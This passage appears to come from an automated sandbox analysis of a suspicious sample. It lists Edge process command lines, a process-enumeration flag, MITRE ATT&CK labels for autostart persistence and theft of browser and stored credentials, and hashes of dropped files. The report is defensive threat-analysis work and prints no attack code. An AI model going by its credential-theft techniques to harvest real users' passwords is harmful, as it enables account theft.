C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6324,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14⤵PID:4472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=3428,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:14⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5676,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3632 /prefetch:144⤵PID:1468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6528 /prefetch:144⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3652,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6500 /prefetch:144⤵PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=3404,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:14⤵PID:1580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=2836 /prefetch:144⤵PID:2508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5952,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:144⤵PID:1776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:144⤵PID:5496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --always-read-main-dll --field-trial-handle=5512,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5756 /prefetch:14⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3592,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:144⤵PID:3156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5780,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=6472 /prefetch:104⤵
- Suspicious behavior: EnumeratesProcesses
PID:4152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3872,i,6245050151994366390,12484333241115564163,262144 --variations-seed-version --mojo-platform-channel-handle=5068 /prefetch:144⤵PID:6088
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4908
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start1⤵PID:2988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:252
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ÔN@1⤵PID:488
Network
MITRE ATT&CK Enterprise v16
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17.5MB
MD5ccdca87540e56b27f2b104bb036662ff
SHA136d79e579770a2e4f619b4c09e635c5d48ff56d5
SHA256630f929545e8277fe3a65970a8ed8c6b8271e2c6446e23334e117fdcecf2c51d
SHA512636e01d3633c5f1abb0736acaab01e3a7a8f7dfe6c919750fab5cfffb85419432829464963af1a4c2f35458a7ab32d2913efdc8beacfdfd2f605cbf82fcf1a37
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\autofill_bypass_cache_forms.json
Filesize146B
MD59357a694006d8bec3d0f8c9607b76ff8
SHA16335ce691999ec10de742cd07d074eb648631259
SHA256b6c37df977f149c5a444c72ea4469ce666c7975d34c6e2e0d9d8ec416f57dd44
SHA51287c2d0192f3a78b13a691cda14da507f260d13331b792eb973869bd6dbd0f207faa48f68882be691641b46c06ed12ee8b9728a3b596df67a1f9a4831b4369a44
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.24\edge_autofill_global_block_list.json
Filesize5KB
MD5adb5f6058f82680a26d6ed02b44e5a21
SHA16197ee74e40c742e184357dcb6dfcc7e32818cae
SHA2567655c9afb5f2ea39b18e302498b34009ca02b72451f82a6d4e7fb4d8d954f050
SHA512742dd8f6eaf1bd5f24b37e90d7a3dce7bd0a8edf399c2dec25cd92d2bd6e1d663ebab3c68234812f0144061d4f22f0c2c43de890f60e24d93133bbfe23a6d1c5
-
Filesize
509KB
MD5c1a0d30e5eebef19db1b7e68fc79d2be
SHA1de4ccb9e7ea5850363d0e7124c01da766425039c
SHA256f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1
SHA512f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a
-
Filesize
280B
MD503b6ceee6d3294b477cb96be0a4821a2
SHA117508a8b887dac0d5b2fdf62cce6ee7989564165
SHA256e373291cec4f23986133c23daa353551f05eda26aac4a4e3686c40f8bfda576e
SHA512581fbd959baff647df5ac757c03b071653bca94c529807775b30e0f4b88ade1f0dd99850daaea1fa0861ce83d3e9d505a004e6c78d45e923ee39728a2d9efda9
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
108KB
MD506d55006c2dec078a94558b85ae01aef
SHA16a9b33e794b38153f67d433b30ac2a7cf66761e6
SHA256088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
SHA512ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60
-
Filesize
2KB
MD5601cfc3d7104c6b0cae6658f98404383
SHA1584fbd6f690483101daa0abbb64bc50b607fee75
SHA256cc545cce17eaaddc438c9d415b453c52a2094d572c5544378778a1da9e4123dd
SHA512ed5871a55bbec95c756ceec85f264de01d6149e614aae2ce4e3313c835a446be6b216d51c9860216fa99813f3e54b9f83e198911837626ea6260ba510c9d5a2a
-
Filesize
2KB
MD5c16c998f4bbdddd1b8d7acafe29c3214
SHA14f203a019ee0681240820be3348bdd982d11c29c
SHA256f4acda152b86656485bf0acfb5d8fd97332ca218154f575507019c3f27889112
SHA5123b3febf39ecca70eb692e71791bea1a46a094b5173033ee6d6ad158c8fde24e32474b7b304c3cf02d93d098cfcf5410eebfedd333032ba3b710739a3b8f63ed6
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
17KB
MD52e98928ff585f8761f31526111a7aab8
SHA1e681ae864d6c3cace37d72df875004b325ecdb9d
SHA2568ac342a17e4d8bed45b06122f4569e7466d05737b45d2a30e1bb1c085e63517b
SHA512744ebdd4dc2f8b4c9355a003dfd098224fd43adcbe99302c1f41defd3b9f094716bc32c722ced0bb6f4af90f47af0ceec2cb0cab9e919c9eac0f95361939cfde
-
Filesize
37KB
MD5fd2bf8754a52c30c7c7c1d7859e89800
SHA1b28e6d8d6bd4b7d3c17bfc82bf675b624b8126cf
SHA2563a4c360ece19a6456a752c7c15cf99cc22661face959e5869aca823fa66838e1
SHA5122b5584e744fe42436f45af8f975ec10443bd82bef713522a2d23c922c20d363483798c9b435baa4e9f015d9bca0761f0abaa4d2b276fc035179c2151667f2ad2
-
Filesize
22KB
MD5934d6a13fbfb4ae8743c8261d8aa980a
SHA1f1bd24c8a5791e92eec58d8947828b63c7bc8679
SHA256ca374ed95b4bce8b5176da51d2bfb080840a791981d8139641dea874b7e582ac
SHA5125ce3d1ebcca354fc9f04e1a1d0a9d1c0f4f79c6ad3051b6298ec3cc091d01e8967a53763e1860dda84bdffed3f5fc0565912a7ab4c639d9091a89ba2365db670
-
Filesize
462B
MD5d5597e746878fede733d9c916085ff07
SHA1ad6e79cff797c397c644cb90c43e61f0b91a11fd
SHA256406b468eb7efa1329fd66e656e9fa68f1c4ac1876ea97776fb95df3318a2f646
SHA5127f374420af238648aac379358db2fec66a9b5cb66b599c130f9fbf326103a30e2497052752618939fd55797bc62418b9a766c0cfb75470e52617d6b390b852e5
-
Filesize
45KB
MD5147f513861d7e6b41a45891b5b30be87
SHA1102b03bd3f45fb552e1ebc303306e72c0771d769
SHA256f729c0824133c0a6260494772344a3b79cac90b70b02f8b87749118a39d9129f
SHA51226d3c674cfc50e85cf59f81ab5ae924c55edcfd136df87912bb9afb7f975bd15d51c34a4c6632c859d8c66141821d049386ee820e804c83c8f3febf670f15ba5
-
Filesize
45KB
MD5338b5cb7cb7a0f02c6d5ec7e082f053d
SHA110853919c968311668dc0b0bad95ce50ff1f5652
SHA2560404a38573cdcc351d9ba19089cdfe690b824df42f86122d47dcee92992b1a4e
SHA5125659c6d1bae4f46e440d10f6e13dd6004aed6461befad1ab27791e44105a3dfae40d08259605cff6a05b89cb0dda4cd80fee681944c5ea82c5a603d7b66779b1
-
Filesize
38KB
MD5afd3c5ce0014b19ed9f1ab0ccb610ac4
SHA167092caede60e40d67327f50f6ff6849cae0b417
SHA256db7faba94361b022c851b0fa50e37af106c2402d975fc78553757a2793640d3f
SHA512c300b1fa73ec915f4ef62d2e3970838d1dc1c63dd72ea9f1d3d7f7e29c61583e205c1710d15237b4f276722e50fa4a7e47545153b4889bc966ebcbe576f085f9
-
Filesize
38KB
MD5cdff623fbbb16b2e2df2d00641ce4ea7
SHA18cd0b1c131528360fd588f4039c2fd1f6bfd5268
SHA2565b6f714d384580984a4396f04997e09ee8619d2e2e8780472c911c1368c81479
SHA512fc1067edbd3afb30765e039fbf436800b434631bd581bc2854db3a6dd263fbc5dbd68846de39d969091902198ded6228a4b012e54737b40a3de35072a42b6681
-
Filesize
45KB
MD53215d72304efe38cbdcedaf22c170a8a
SHA1a18bd9209c3d4c7f06710491aac0cf99fed1d04f
SHA25675f5eeeb175e1c37ea1022bb9426fc33f0c761ac30fb09599493d0ce08f671ee
SHA512d3b2b688e6e7839784730b0a8badafee99f799a50af383cd9690f3ca1b037de156cb2a2091160242658a4c6bc9509721c098c556a225cf2eb028b98a26136d42
-
Filesize
1KB
MD5ee002cb9e51bb8dfa89640a406a1090a
SHA149ee3ad535947d8821ffdeb67ffc9bc37d1ebbb2
SHA2563dbd2c90050b652d63656481c3e5871c52261575292db77d4ea63419f187a55b
SHA512d1fdcc436b8ca8c68d4dc7077f84f803a535bf2ce31d9eb5d0c466b62d6567b2c59974995060403ed757e92245db07e70c6bddbf1c3519fed300cc5b9bf9177c
-
Filesize
84B
MD5e0909520982fc48e47a6451443b11741
SHA10e46425274933c153ebf5a03f25e693267a8cea2
SHA2562e9e6138305d702f3c9b89d6e9dc4931b548c69bb86db64e585fa2e37b8ef654
SHA5123fdf504cb0bf39a807fa15a8ec31a6efd8083888692935ec31d70b4ef6eef89b8527c6a75a46bf7ae3efeeaa507ac3c7cccda5246a2f073ac603a7ffa10d20a8
-
Filesize
119B
MD5390af74c5ae643320cad0cef4fa8fee1
SHA122ce727f9bcff9a914eb1d58ba8384de6fbda7e1
SHA2561148c28e540b9b96237b35170a547a13165d6c7c039b8fff9e4b2cd774b92f5a
SHA512deaeeeffdddea1a9047e97d82e3bb701fb865adcd77ef9e985bb0ec5e4057155e7b83cad4f9f3dd256edf89f19d1075349cea5005dffff8420da4d0646be413a
-
Filesize
176B
MD58177721150435a9b333475e2b8a6e691
SHA18aa8981617e8f3d8967a0a4a2d20315317eba293
SHA2568a4800ed5f63b9371a024c501ee2b031af94539e32e6753214e6d99c625c018c
SHA512540c4c52030c6a4e1efcfab5eb59760c696bb3e3f1b8f93c97a6368639a911ba3d395190fc0798d99f3c63e25b6dcf2ded482bbda34d36ddd874dd20c2cfdf74